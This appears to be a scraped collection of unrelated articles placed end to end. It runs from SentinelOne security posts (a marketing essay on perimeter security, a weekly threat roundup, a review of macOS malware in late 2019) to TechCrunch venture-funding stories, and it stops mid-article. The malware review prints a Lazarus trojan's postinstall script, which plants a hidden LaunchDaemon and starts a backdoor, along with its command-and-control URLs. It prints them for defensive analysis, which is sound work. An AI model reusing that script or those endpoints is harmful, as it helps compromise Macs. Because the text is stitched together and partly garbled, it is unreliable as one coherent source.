The Demise Of the Perimeter and the Rise Of the Security Platform

Network security today is clouded in more complexity than ever. Only a few years ago, a network security engineer moving from one organization to another could rely on being faced with a relatively similar challenge in their new post as they had faced in their previous one. Networks, no matter how multi-layered or how diverse the equipment, were still primarily a collection of trusted subnets shielded from the untrusted wider internet by firewalls and DMZ servers. These days, we hear talk of the post-perimeter world, cloud architecture, zero trust networking, microsegmentation and, of course, the ‘Internet of Things’, aka IoT. In this post, we explore these concepts and look at the challenges and solutions for organizations trying to cope with this seismic shift in enterprise networking. 

image demise of the perimeter

Why ‘Securing the Perimeter’ Is No Longer Enough

The demise of the perimeter has been a prominent theme in cybersecurity for the past several years, and for good reason. Traditionally, enterprise IT architecture was comprised of a data center, internal network, endpoints and an internet gateway. To secure this “traditional” architecture, organizations needed a firewall to police inbound traffic, a sandbox to inspect incoming files (usually by email), network security solutions for packet capture and network traffic analysis, and endpoint security solutions to protect the endpoints themselves.

This architecture has always faced inherent security challenges. From social engineering and phishing attacks that abuse the naive assumption that authenticated traffic can be trusted to vulnerabilities in firewall hardware and software, threat actors have always found ways to gain access to enterprise networks.

But the rapid adoption of mobile devices and then cloud technologies has seen the traditional enterprise architecture change, and with it the apparatus needed for security. Today, an enterprise is more likely to have a mixture of local networks, endpoints, mobile devices, cloud applications, and networked devices (whether legitimate or rogue). Employees need access to network assets from mobile devices, and on-premise data centers have widely been replaced in part or entirely by external Cloud providers, storing sensitive organizational data on rented servers whose physical location and security is opaque.

This new architecture increases the organization’s attack surface tenfold and makes the old ‘secure the perimeter‘ paradigm obsolete. 

How Do Organizations Cope With Network Security Today?

Organizations have coped with this seismic change mostly by trying to do more of the same, while integrating new methodologies and, to a lesser extent, new security solutions. The focus is on identity and access management solutions and network segregation as embodied in the zero trust, microsegmention and SDP methodologies. Let’s take a look at these.

Zero Trust

One of the most prominent approaches adopted by many organizations is that of “Zero Trust”, a term coined by research firm Forrester, and its main principle is “never trust, always verify”. It is especially suited to organizations that use cloud applications and infrastructure as it assumes that even entities within the perimeter cannot be trusted.

Zero trust is still very much a buzzword that is used for selling authentication mechanisms for cloud applications and by no means can obviate endpoint or network security solutions.

Microsegmentation

Microsegmentation emphasizes the creation of secure zones to allow organizations to ‘segment’ or isolate workloads so that they can be protected individually. This is utilized mostly in asset-rich environments such as data centers and cloud deployments. However, doing this in a large enterprise environment, with multiple networks, cloud platforms and firewalls is very complicated and presents a challenge to network engineers to deploy and configure in a secure manner.

Effective microsegmentation requires visibility, something many sprawling, disparate networks lack. Without knowing what devices are on the network, it can be difficult for network engineers to know what to segment.

Software-defined Perimeter (SDP)

Software-defined Perimeter (SDP) is a security framework developed by the Cloud Security Alliance (CSA) that controls access to resources based on identity. The aim of an SDP is to allow users to connect to applications, services and systems on the network in a secure way by hiding the underlying infrastructure, including such things as IP addresses, port number and DNS information. This “closed” or “dark cloud” model, in which a network device denies connections from all others applications and devices except the one “that needs to know”, means that attackers are prevented from deploying lateral movement techniques, running distributed denial of service attacks and exploiting other common network incursion TTPs. 

Like zero trust and microsegmentation, SDP is useful in certain scenarios; however, these technologies are lacking when it comes to integrating with SIEM, which is where most organizations desire to manage their security operations from.

And What About the Internet of Things (IoT)?

The problem of visibility is even more acute when it comes to IoT devices. Handling complexity is one thing, but handling things you don’t even know are there is even harder. The new security approaches like those mentioned above (SDP, Zero Trust, Microsegmentation), and even the traditional ones (Network, perimeter and endpoint solutions) are completely oblivious to other entities and threats that modern networks are exposed to, such as “Smart” or IoT devices. The fact that the network is now connected to some Linux server out there (aka “in the Cloud”) and is open or accessed by connected devices makes the perimeter truly irrelevant, along with traditional security solutions, too.

How Do You Handle Scale And Machine Speed?

In addition to all the challenges mentioned, we need to consider the fact that things are not merely getting more complex and difficult to inventory, but things are getting more numerous. There are more endpoints, servers, connected devices, cloud applications and users than ever before, and that all adds up to more entry points into the network.

On top of the sheer quantity of devices connecting to company assets, these elements operate, generate data and communicate at a much greater speed than in the past, giving IT and security personnel less time to react to threats and malfunctions.

As much as security people would like these trends to reverse, it’s impossible to turn this ship. Cloud, hybrid networks and connected devices are integral parts of the modern enterprise.

Augmenting Existing Solutions with a Security Platform

Enterprise will continue to use existing solutions such as firewalls, NTA and endpoint security. But trying to combine multiple, existing solutions in conjunction with new methodologies and products, all from an array of different vendors, is a sure way to increase complexity, reduce visibility and generate more work.

Integrating new products and workflow could be a real burden, and if you think that alert fatigue is bad today, wait and see how hard it will be to manage thousands of alerts on multiple systems, various consoles and diverse dashboards. 

The answer to this cloud of chaos is to reduce complexity, to unify these solutions onto a single platform that can – from a single console and single endpoint agent – enable autonomous, prevention, detection and response. A single platform that can hunt in the context of all enterprise assets, be they on-premise, in the cloud or just rogue devices, such as insecure BYODs attached to the network by employees and outside of IT control or external attackers spoofing legitimate devices into connecting to them. 

This platform should be automated, and future-proof – meaning it must be able to integrate with additional solutions and cloud platforms through a rich set of native APIs – and, of course, it must be able to counter novel threats through utilizing machine learning and behavioral detection. 

Such a platform should enable all required security functionalities – external device and firewall controls, alert handling, forensic investigation and proactive hunting, on all endpoints, IoT devices and cloud platforms, and it should not require extensive training or manpower to operate.

A single security platform that can solve the challenges of modern enterprise architecture and not only cater for today’s complexities and threats, but also easily “grow” along with the organic growth of the organization, is the only plausible investment in the future of your enterprise security. If you would like to try a free demo and experience how SentinelOne meets the challenges of today’s enterprise networks, contact us today.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

The Good, the Bad and the Ugly in Cybersecurity – Week 51

Image of The Good, The Bad & The Ugly in CyberSecurity

The Good

Just in the nick of time before year’s end, Apple has delivered on its promise to introduce an expanded bug bounty program in 2019 that covers all its hardware platforms and is open to anyone. The Apple Security Bounty program offers some generous payouts, and is likely to attract the interest of researchers who typically tend to focus on web applications and the Windows platform. 

image of apple bug bounty

The ToC are a must read for anyone contemplating taking part. Among other conditions, note that the company’s digital payment service, Apple Pay, is not in scope.

Apple isn’t the only one offering extra cash to those helping to improve security this week, either. Google announced this week that its Patch Rewards Program for Open Source Community will begin offering upfront financial assistance to third-party open source projects that need development funds to focus on security issues. The new initiative will come into effect from January 1st, 2020 and should be particularly attractive to small projects on restricted budgets. 

The Bad

Now is the season to be cheerful, unless you’re an Emotet victim. The trojan’s latest malspam campaign not only wants to take advantage of the seasonal round of Christmas party invites to hook unsuspecting recipients but also asks victims to “wear your tackiest/ugliest Christmas sweater” to the fake party.

image of emotet xmas email

The emails carry poisoned Word documents with names such as “Christmas party.doc” and “Party menu.doc”. When a user tries to open the document, they are first requested to ‘Enable Content’ or ‘Enable Editing’. Doing so runs the malicious macros embedded in the document and serves up the Emotet trojan for an unwelcome seasonal surprise.

Meanwhile, in a graphic portrayal of the damage an enterprise-scale infection can cause, 38000 students and staff at the Justus Liebig University Gießen (JLU) in Germany have been queueing up to personally collect new passwords for their university accounts. JLU was forced to reset all account passwords after falling victim to an unspecified cyber attack. A mass clean-up is underway, with the university banning use of all campus computers until they have been disinfected and badged with a green “healthy” sticker by IT. That could take some time.

image of queuing for passwords at JLU
Source

The Ugly

Data breaches are always ugly, especially when they combine the worst intentions of criminals with the failings of enterprise opsec. This week has seen more than its fair share of ugly, but the first one that caught our eye was news that Thinkrace, a Chinese manufacturer of location tracking devices widely rebranded and used in 3rd party smartwatches and other location-aware products, has been leaking location and other data through an insecure cloud platform. The leaky backend is used to communicate with and issue commands to all 47 million of its devices. The cloud platform is so vulnerable that researchers could both track device-wearer’s locations and were able to access any of over 2 million voice recordings stored on the company’s servers. The recordings contained conversations between parents and children using the manufacturer’s smartwatches with a voice-chat feature.

In more ugly news for consumers, it appears that cybercriminals installed malware at potentially all 700 or so Wawa convenience stores and gas stations along the East Coast of the United States from March through to December of this year. In a statement, the company said that it’s possible that any customers using a payment card at a Wawa in-store payment or fuel dispenser during that time could have had their card number, expiration date and cardholder name scraped by the malware.

image of wawa malware tweet

Wawa says that as of December 12 the infection was removed, and ATM cash machines in the stores were not affected. However, when just doing your weekly shop or filling up the tank becomes an exercise in managing cyber risk, you know enterprise security has still got an awful lot of work to do going into 2020.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Centaurs, centurions, centipedes: the $100M ARR CLUB

Hello and welcome back to Equity, TechCrunch’s venture capital-focused podcast, where we unpack the numbers behind the headlines.

This week Kate was in SF, Alex was in Providence and there was a mountain of news to shovel through. If you’re here because we mentioned linking to a certain story in the show notes, that’s here. For everyone else, let’s get into the agenda.

We kicked off with a look at three new venture funds. In order:

  • Tusk Ventures: Tusk’s new fund, worth $70 million, is an effective doubling of its prior fund’s $36 million size. The politically savvy firm has put money into Coinbase, and other companies that deal with regulated industries.
  • Sapphire Ventures: SAP’s former corporate venture fund Sapphire Ventures announced a whopping $1.4 billion fundraise this week. Sapphire may be one of or the most successful CVC spinouts to date.
  • Moxxie: Katie Jacobs Stanton, known for co-founding #ANGELS, just closed her debut fund on $25 million. Kate chatted with her about her experience fundraising her very own fund, some of her previous investment and her plans for Moxxie Ventures, so there was plenty to unpack here.

From there we turned to the gender imbalance in the world of venture capital. This year, companies founded by women raised only 2.8% of capital. These not-so-stellar statistics are always worth digging into.

We then took a quick look at two different venture rounds, including ProdPerfect’s $13 million Series A and Pepper’s smaller $5.6 million round. ProdPerfect’s round was led by Anthos Capital (known for investing in Honey, which sold for $4 billion). The company has $2 million in ARR and is growing quickly. Pepper, formed by former Snap denizens, is working to help other startups lower their CAC costs in-channel. Smart.

And finally, Alex wanted to bring up his series on startups that reach the $100 million ARR threshold (Extra Crunch membership required). A first piece looking into the idea led to a few more submissions. There seem to be enough companies to name the grouping with something nice. Centurion? Centipede? Centaur? We’re working on it.

Equity drops every Friday at 6:00 am PT, so subscribe to us on Apple PodcastsOvercastSpotify and all the casts.

F5 acquires Shape Security for $1B

F5 got an expensive holiday present today, snagging startup Shape Security for approximately $1 billion.

What the networking company gets with a shiny red ribbon is a security product that helps stop automated attacks like credential stuffing. In an article earlier this year, Shape CTO Shuman Ghosemajumder explained what the company does:

We’re an enterprise-focused company that protects the majority of large U.S. banks, the majority of the largest airlines, similar kinds of profiles with major retailers, hotel chains, government agencies and so on. We specifically protect them against automated fraud and abuse on their consumer-facing applications — their websites and their mobile apps.

F5 president and CEO François Locoh-Donou sees a way to protect his customers in a comprehensive way. “With Shape, we will deliver end-to-end application protection, which means revenue generating, brand-anchoring applications are protected from the point at which they are created through to the point where consumers interact with them—from code to customer,” Locoh-Donou said in a statement.

As for Shape, CEO Derek Smith said that it wasn’t a huge coincidence that F5 was the buyer, given his company was seeing F5 consistently in its customers. Now they can work together as a single platform.

Shape launched in 2011 and raised $183 million, according to Crunchbase data. Investors included Kleiner Perkins, Tomorrow Partners, Norwest Venture Partners, Baseline Ventures and C5 Capital. In its most recent round in September, the company raised $51 million on a valuation of $1 billion.

F5 has been in a spending mood this year. It also acquired NGINX in March for $670 million. NGINX is the commercial company behind the open-source web server of the same name. It’s worth noting that prior to that, F5 had not made an acquisition since 2014.

It was a big year in security M&A. Consider that in June, four security companies sold in one three-day period. That included Insight Partners buying Recorded Future for $780 million and FireEye buying Verodin for $250 million. Palo Alto Networks bought two companies in the period: Twistlock for $400 million and PureSec for between $60 and $70 million.

This deal is expected to close in mid-2020, and is of course, subject to standard regulatory approval. Upon closing Shape’s Smith will join the F5 management team and Shape employees will be folded into F5. The company will remain in its Santa Clara headquarters.

Extra Crunch members get 25% off Otter.ai voice meeting notes

Extra Crunch community perks have a new offer from voice meeting notes service, Otter.ai. Starting today, annual and two-year Extra Crunch members can receive 25% off an annual plan for Otter Premium or Otter for Teams.

Otter.ai is an AI-powered assistant that generates rich notes from meetings, interviews, lectures and other voice conversations. You can record, review, search and edit the notes in real time, and organize the conversations from any device. We also use Otter.ai regularly here at TechCrunch to produce transcripts and voice notes from panels at our events, and it’s a great way to easily organize and search the conversations. Learn more about Otter.ai here

To qualify for the Otter.ai community perk from Extra Crunch, you must be an annual or two-year Extra Crunch member. The 25% discount only applies to annual plans with Otter.ai, but it can be used for either the Premium or Teams plan. You can learn more about the pricing for Otter.ai here, and you can sign up for Extra Crunch here.

Extra Crunch is a membership program from TechCrunch that features how-tos and interviews on company building, intelligence on the most disruptive opportunities for startups, an experience on TechCrunch.com that’s free of banner ads, discounts on TechCrunch events and several community perks like the one mentioned in this article. Our goal is to democratize information about startups, and we’d love to have you join our community.

You can sign up for Extra Crunch here.

After signing up for an annual or two-year Extra Crunch membership, you’ll receive a welcome email with a link to sign up for Otter.ai and claim the discount. Otter.ai offers a free plan with capped minutes, and if you are interested in unlocking the full potential, you can purchase the annual plan with the 25% discount.

If you are already an annual or two-year Extra Crunch member, you will receive an email with the offer at some point over the next 24 hours. If you are currently a monthly Extra Crunch subscriber and want to upgrade to annual in order to claim this deal, head over to the “my account” section on TechCrunch.com and click the “upgrade” button.

This is one of several community perks we’ve launched for Extra Crunch annual members. Other community perks include a 20% discount on TechCrunch events, 100,000 Brex rewards points upon credit card sign up and an opportunity to claim $1,000 in AWS credits. For a full list of perks from partners, head here.

If there are other community perks you want to see us add, please let us know by emailing travis@techcrunch.com.

Sign up for an annual Extra Crunch membership today to claim this community perk. You can purchase an annual Extra Crunch membership here.

Disclaimer:

This offer is provided as a business partnership between TechCrunch and Otter.ai, but it is not an endorsement from the TechCrunch editorial team. TechCrunch’s business operations remain separate to ensure editorial integrity. 

MacOS Malware Outbreaks 2019 | The Second 6 Months

Earlier this year, we did a roundup of the first 6 months of MacOS malware in 2019, noting that there had been quite an uptick in outbreaks, from a return of OSX.Dok and Lazarus to new cryptominers, a fake WhatsApp trojan and the rapid development of a macOS bug which allowed remotely-hosted attacker code to execute on a local machine without warning from Gatekeeper. So what have attackers been up to since then, and what new tricks and tips do defenders need to be aware of? Let’s take a look at macOS malware from July to December, 2019.

image macos malware second half 2019

OSX/Tarmac – What’s New?

The early months of the second half of 2019 were encouraging for defenders. We didn’t see any new outbreaks through July and August, although there was plenty of increased activity from known threats, which we will mention later. The first sign of something stirring was a report of what was claimed to be a new malware threat dubbed “Tarmac” by researchers at Confiant, which sent many of us scrambling for a sample. The story was picked up by ZDNet and a few other outlets a few weeks later.

In their initial report, Confiant did link to a long list of known Shlayer samples, and reported that their Tarmac sample was a second stage payload that was sometimes, but not reliably, dropped by some of those.

With Confiant’s assistance (much thx @lordx64 🙂 ), we were finally able to get a look at the sample they labelled Tarmac, and which is now also available on VirusTotal.

image of osx tarmac on virustotal

There’s no doubt that this is malware, but our analysis showed it to be a variant of what at SentinelOne we internally call “BundleMeUp”, and which is more widely known as “Mughthesec”. Patrick Wardle did a nice write up of the first variant back in 2017, which we detect as OSX.BundleMeUp.A. The “B” variant analysed by Confiant is only one of eight variants detected by us since 2018.

Nevertheless, Confiant did a very nice technical analysis here, which is well worth a read for anyone interested in learning macOS malware reverse engineering.

At the time of their analysis, Confiant weren’t seeing any detections for the sample on VirusTotal, perhaps leading them to make the assumption they had discovered something new. Alas, as VT themselves warn, it’s an error to take the findings on VT as indicative of what vendors’ actual engines really detect. That’s because many of the engines supplied to VT are limited versions of what vendors’ actually supply to their own customers.

Sample: 3dd5a87482f46e88fc8a8f849f21768646af987100fd38c1a0bcc2a6a8a5a073

Lazarus Take 1: OSX/GMERA, Stockfoli

September was not without real incident, however, as the first in a series of Lazarus macOS malware samples came to light in the form of OSX.GMERA. Since we wrote this up at the time, we’ll refer readers to our post here on SentinelLabs rather than repeat the whole analysis here.

Here’s the malicious run.sh script that is hidden in the Resources folder and contains encoded base64. The obfuscated code drops a hidden plist file called .com.apple.upd.plist in the user’s Library LaunchAgents folder.

image of Lazarus Stockfoli malware

However, the tl;dr was that the threat actors had bundled a real stock and crypto portfolio app inside their own almost identically named trojan app. Unsuspecting users running the malware would be presented with all the functionality of the real app, but unwittingly install a backdoor allowing the cybercriminals full access to their device through a reverse shell.

Sample: d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68

Lazarus Take 2: JMTTrader

Almost exactly a month after news broke about OSX.GMERA came another Lazarus discovery: JMTTrader. Following a pattern seen earlier with Celas Trade Pro, JMTTrader appears to be a completely fake organization set up with the express purpose of swindling unwary users out of cryptocurrency.

A fake company website offering “Advanced trading functions for cryptocurrency traders that includes: technical and fundamental analysis, automated trading and many other innovative features” was used to lure victims to a Github repo containing malware hidden inside an otherwise functional application.

Distributed in the form of an Apple disk image, the .dmg file contained a package which installed the trading app along with the malware, hidden inside the innocent-sounding CrashReporter executable installed in /Library/JMTTrader/CrashReporter. For persistence, a root-level LaunchDaemon is dropped at /Library/LaunchDaemons/org.jmtrading.plist.

#!/bin/sh
mv /Applications/JMTTrader.app/Contents/Resources/.org.jmttrading.plist /Library/LaunchDaemons/org.jmttrading.plist
chmod 644 /Library/LaunchDaemons/org.jmttrading.plist
mkdir /Library/JMTTrader
mv /Applications/JMTTrader.app/Contents/Resources/.CrashReporter /Library/JMTTrader/CrashReporter
chmod +x /Library/JMTTrader/CrashReporter
/Library/JMTTrader/CrashReporter Maintain &

Here we take a look at the package using the excellent Suspicious Package inspection tool:

gif image of Lazarus JMT Trader malware

According to this analysis, which is worth reading in full, the CrashReporter executable opens a backdoor to an encrypted C2 server at https://beastgoc.com/grepmonux.php and appears to have the ability to execute commands, write files and exfiltrate data.

image of Lazarus JMT Trader malware

Sample: 4d6078fc1ea6d3cd65c3ceabf65961689c5bc2d81f18c55b859211a60c141806

Lazarus Take 3: FlashUpdateCheck, Album.app

Hot on the heels of JMTTrader came another, different Lazarus find from @cyberwar_15, packaged in the form of an application called “Album.app”.

image of Lazarus Album tweet

Although this malware only came to light in October, it was signed during, and presumably in circulation since, May of this year.

image of Lazarus Album app malware

The Album.app presents itself as a Macromedia Flash player and does indeed present an “album” of pictures, showing a portfolio of images of young Asian and Korean girls. Meanwhile, it also installs a persistence agent at ~/Library/LaunchAgents/com.adobe.macromedia.flash.plist and bearing the label FlashUpdate. A hidden mach-o binary is also deposited at ~/.FlashUpdateCheck, which functions as the Program Argument for the Launch Agent.

The FlashUpdateCheck executable calls out to several IPs:

https://crabbedly.club/board.php
https://craypot.live/board.php
https://indagator.club/board.php

image of Lazarus flash update check malware

Although these were no longer live during our analysis, research suggests that the payload is the same backdoor payload we described earlier this year here.

Sample: d91c233b2f1177357387c29d92bd3f29fab7b90760e59a893a0f447ef2cb4715

Lazarus Take 4: UnionCryptoTrader

2019 is still not done seeing Lazarus activity on macOS, however, and December has seen yet another variant, UnionCryptoTrader.

This malware seems like a duplicate of the JMTTrader scam, complete with fake company website and a disk image with a malicious package hidden inside a purpose-built, “innocent” parent application. However, there are significant differences.

First, while the postinstall script in the package takes almost identical form, save for changing the filenames from .CrashReporter and .orgjmttrading.plist for .unioncryptoupdater and .vip.unioncrypto.plist, the LaunchDaemon Program Arguments also drop the Maintain argument, possibly to avoid earlier detection algorithms.

A diff of the code in the two backdoor executables, however, shows they are very different, and the newer mach-o reveals some (possibly intentional) breadcrumbs like macmini and Barbeque in the strings.

/Volumes/Work/Loader/macos/Barbeque/
barbeque.cpp
/Users/macmini/Library/Developer/Xcode/DerivedData/macloader-

More interesting is that the newer .unioncryptoupdater imports an API allowing the attackers to mimic “fileless” malware:

image of Lazarus trader malware

This shows an interesting development and marks out UnionCryptoTrader as a significant re-tooling from the earlier JMTTrader code.

Sample: 2ab58b7ce583402bf4cbc90bee643ba5f9503461f91574845264d4f7e3ccb390

What Else Happened in macOS Malware in 2019?

The second half of 2019 was, in some respects, quiet in terms of outbreaks, with APT Lazarus stealing the show (and the money) and little evidence of other APTs or new actors targeting macOS coming to light, thankfully. That said, there was also a clear trend over the last 6 months of known-actors changing tactics and becoming more aggressive at the same time.

Commodity macOS adware/malware (it’s becoming difficult to separate the two) has shown some important trends over the last 6 months or so. First, perhaps in response to Apple’s Notarization and other security enhancements, threat actors have become far more blatant in simply instructing users on how to disable their own built-in protections.

image how to bypass mac os security

Second, we’re seeing a rising trend of cybercriminals offering up executables that eschew the typical Apple format of a bundle containing a mach-o executable. Instead, they are increasingly serving up executable scripts that dump a first-stage mach-o payload in the /tmp folder, execute in order to download the second stage adware, PUP, or malware and then delete the initial stager.

Thirdly, as we’ve mentioned before, 2019 has seen bad actors target users in more aggressive ways, running malware from /var/root and dropping multiple persistence agents to thwart removal by simple end user tools.

Prior to 2019, we rarely saw macOS malware developers using anything other than plain-to-see LaunchDaemons and LaunchAgents. This year, we’ve seen more incidents of these hiding with both a dot prefix and/or chflags to conceal persistence agents from inspection in the Finder. We’ve also seen an uptick in the use of cron jobs for persistence. As some of the legacy and lower-end protection tools catch up to these basic tricks, we expect the bad actors to up their game in 2020 and increase their sophistication.

Conclusion

It’s been a year of two halves on the macOS malware outbreaks front. The first six months showed a number of diverse actors ready, willing and able to spend time and effort targeting macOS users. From July onwards, however, the main APT threat actor has been North-Korean backed Lazarus / Hidden Cobra, while a relentless plague of known but evolving commodity malware, adware and PUPs seem to be coalescing into a symbiotic group ready to sell PPI installs to each other and share the profits.

One thing that remains clear, though, whether it’s commodity malware socially engineering users to bypass the built-in macOS security controls or advanced persistent threat groups setting up fake companies and developing functional apps in order to deliver hidden malware, there’s never been more need to ensure that your endpoints do not rely on reputational, signature-based software that can only recognize threats that have already been revealed. In order to stay truly protected, an active EDR solution that blocks malicious behaviour regardless of its source or origin is the only way to protect the integrity of your data, services and customers.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

SAP spinout Sapphire Ventures raises $1.4B for new investments

Sapphire Ventures, the former corporate venture arm of SAP, has raised $1.4 billion for growth investments, including a $150 million opportunity fund to support larger deals.

The firm, which focuses primarily on enterprise tech companies in the U.S., Europe and Israel, writes checks to Series B through pre-IPO businesses. Its portfolio includes 23andMe, Sumo Logic and TransferWise.

The new funds brings Sapphire Ventures, which became independent from the German software company SAP in 2011, assets under management to north of $4 billion. Sapphire will write checks sized between $5 million and $100 million with the new funds, allowing the team “to do any financing we need to or want to,” chief executive officer and managing director Nino Marakovic tells TechCrunch. Sapphire’s fourth growth fund is the firm’s largest to date, at more than double the size of their $700 million Fund III. 

“We need this fund because companies are staying private much longer because they want to get to a $200 million revenue run rate before they go public,” Sapphire Ventures president and co-founder Jai Das (pictured) tells TechCrunch. “We want to have the capital to support these companies as they keep growing.”

News of the fund comes nearly one year after Sapphire Ventures lassoed $115 million from new limited partners to invest at the intersection of tech, sports, media and entertainment. Sapphire Sport has ties to the sports industry, from City Football Group, which owns English Premier League team Manchester City, to Adidas, the owners of the Indiana Pacers, New York Jets, San Jose Sharks and Tampa Bay Lightning, among others.

Before that, the firm closed on $1 billion for its third flagship venture fund.

With seven check writers and another seven investment professionals focused on growth-stage investments, Sapphire has had a number of recent wins, counting a total of 21 initial public offerings and 55 exits since the firm’s inception.

“We’re excited to have now reached critical mass with $4 billion under management,” Marakovic said. “We are the right size to take advantage of our target area of early and later-stage enterprise software companies. We are innovating on the model by adding value-add LPs and trying to align our whole model of services to the target companies to serve them as best as possible.”

Huckleberry raises $18M to put small business insurance online

The insurance industry, sleepy and ancient, is ripe for disruption. We’ve seen companies like Lemonade, Hippo and Rhino get in on that opportunity. Today, an insurtech company focused on small business insurance has raised $18 million to keep growing.

Meet Huckleberry, whose Series A was led by Tribe Capital, with participation from Amaranthine, Crosslink Capital and Uncork Capital.

Huckleberry launched in 2017 to offer business insurance, including workers’ compensation and general liability, all through an online portal.

Small business insurance coverage is not like car insurance or renters insurance. It’s not as simple as filling out a few forms and getting a quote. Even if a few platforms do have algorithms for providing quotes, you can’t really close the deal unless you get on the phone.

It’s an incredibly tedious and stressful process. In fact, Huckleberry co-founders Bryan O’Connell and Steve Au first came up with the idea for Huckleberry when they were seeking out their own small business coverage for a previous startup idea.

The industry itself is incredibly fragmented, which is caused in part by the fact that small business coverage underwriting varies wildly from business to business. For example, the policy for three or four restaurants might look relatively similar. However, a fast food restaurant might be identified as a higher risk with regards to workers’ compensation than a Michelin-star restaurant, where workers might be more eager to get back to work and take home their tip money. These differences come in the form of location, operations and many other factors, as well as business vertical.

Huckleberry has worked to build out myriad coverage verticals, including food and beverage, fitness, retail, legal, healthcare, hair and beauty and more.

The firm offers worker’s comp, as well as a package policy that includes general liability, property and business interruption insurance. Customers also can purchase add-ons like hired and non-owned auto insurance, employment practices liability insurance (EPLI), liquor liability insurance, employee dishonesty coverage, professional liability insurance, equipment breakdown coverage and spoilage coverage.

Huckleberry isn’t itself an insurance carrier, but does have the authority to underwrite and sell policies on behalf of the carrier. That said, Huckleberry’s expansion both by vertical and geography is more difficult than your average software startup. The regulatory landscape of insurance in the U.S. goes state by state.

“Our biggest challenge is navigating 50 states’ worth of extremely complicated regulations on something that is much more complicated than a software product,” said O’Connell. “We’re trying to protect individual workers and businesses all while staying fully compliant in every market.”

Tech startups going public raise 3x more today than in 2015

Hello and welcome back to our regular morning look at private companies, public markets and the grey space in between.

Today we’re exploring the 2019 IPO cohort from a capital-in perspective. How much did tech companies going public in 2019 raise before they went public, and what impact that did that have on their valuation when they debuted?

Looking ahead, the tech startups and other venture-backed companies expected to go public in 2020 will include a similar mix of mid-sized offerings, unicorn debuts and perhaps a huge direct listing. What we’ve seen in 2019 should be a good prelude to the 2020 IPO market.

With that in mind, let’s examine how much money tech companies that went public this year raised before their IPO. Spoiler: It’s a lot more than was normal just a few years ago. Afterwards, I have a question regarding what to call companies in the $100 million ARR club (more here) that we’ve been exploring lately. Let’s go!

Privately rich

According to CBInsights’ recent IPO 2020 IPO report, there’s a sharp, upward swing in the amount of capital that tech companies raise before they go public. It’s so steep that the data draw a nearly linear breakout from a preceding, comfortable normal.

Here’s the chart:

There are two distinct periods; from 2012 to 2015, raising up to $100 million was the norm (median) for tech companies going public. That’s still a lot of cash, mind.

The second period is more exciting. From 2016 on we can see a private capital arms race in which tech companies going public stacked ever-greater sums under their mattresses before debuting. This is generally consistent with a different trend that you are also aware of, namely the rise of $100 million financings.

Before we turn back to the CBInsights data, let’s observe a chart from Crunchbase News that underscores the simply astounding rise of $100 million financings that was published just a few weeks ago. As you look at this chart, remember that prior to 2016, more than half of venture-backed technology companies going public had raised less than $100 million total:

Now, compare the two data sets.

Three SaaS companies we think will make it to $1B in revenue

What’s the most successful pure SaaS company of all time? The answer is Salesforce, and it’s no contest — the company closed the year on an $18 billion run rate, placing it in a category no other company born in the cloud can touch.

That Salesforce is on such an impressive run rate might suggest that reaching a billion in revenue is a fairly easy proposition for an enterprise SaaS company, but firms in this category grow or drive revenue like Salesforce. Some, in fact, find themselves growing much more slowly than anyone thought, but keep slugging it out as they inch steadily toward the $1 billion mark. This happens to public and private SaaS companies alike, which means that we can look at few public ones thanks to their regular earnings disclosures.

It’s a good time to look back at the year and analyze a few firms that should reach the mythical $1 billion in revenue at some point. Today we’re examining Zuora, a SaaS player focused on building and managing subscription-based services. GuideWire, a company transitioning to SaaS with big ambitions and Box, a well-known SaaS player caught somewhere between big and a billion.

Zuora: betting on SaaS

We’ll start with the smallest company that caught our eye, Zuora . We’ll proceed from here going up in revenue terms.

Zuora is as pure a SaaS company as you can imagine. The San Mateo-based company raised nearly a quarter billion dollars while private to build out the technology that other companies use to help build their own subscription-based businesses. To some degree, Zuora’s success can be viewed as a proxy for SaaS as a whole.

However, while SaaS has chugged along admirably, Zuora has seen its share price fall by more than half in recent quarters.

At issue is the firm’s slowing growth:

  • In the quarter detailed on March 21, 2019, Zuora’s subscription revenue growth slowed to 35% compared to the prior year period. Total revenue growth grew an even slower at 29%.
  • In the quarter announced on May 30, 2019, Zuora’s subscription revenue grew 32% while its total revenue expanded 22%.
  • Moving forward in time, the company’s quarter reported on August 28, 2019 saw subscription revenue growth of 24% and total revenue growth of 21% compared to the year-ago quarter.
  • Finally, in its most recent quarterly report earlier this month, Zuora reported marginally better 25% subscription revenue growth, but slower total revenue growth of 17%.

Why is Zuora’s growth slowing? There’s no single reason to point out. Reading through coverage of the firm’s earnings report reveals a number of issues that the company has dealt with this year, including slow sales rep ramp and some technology complaints. Add in Stripe’s meteoric rise (the unicorn added tools for subscription billing in 2018, expanding the product to Europe earlier this year) and you can see why Zuora has had a tough year.

Adding to its difficulties, the company has lost more money while its growth has slowed. Zuora’s net loss expanded from $53.6 million in the three calendar quarters of 2018. That rose to $59.9 million over the same period in 2019. But the news is not all bad.

In spite of these numbers, Zuora is still growing; the company expects around $276 to $278 million in revenue in its current fiscal year and between $206 and $207 million in subscription top-line revenue over the same period.

At the revenue growth pace set in its most recent quarter (17% in the third quarter of its fiscal 2020) the company is eight years from reaching $1 billion in revenue. However, Zuora’s rising subscription growth rate in the same period is very encouraging. And, the company’s cash burn is declining. Indeed, in the most recent quarter Zuora’s operations generated cash. That improvement led to the firm’s free cash flow improving by half in the first three calendar quarters of 2019.

It also has pedigree on its side. Founder and CEO Tien Tzuo was employee number 11 at Salesforce when the company launched in 1999. He left the company in 2007 to start Zuora after realizing that traditional accounting methods designed to account for selling a widget wouldn’t work in the subscription world.

Zuora’s subscription revenue is high-margin, but the rest of its revenue (services, mostly) is not. So, with less thirst for cash and modestly improving subscription revenue growth, Zuora is still on the path towards the next revenue threshold despite a rough past year.

Guidewire: going SaaS the hard way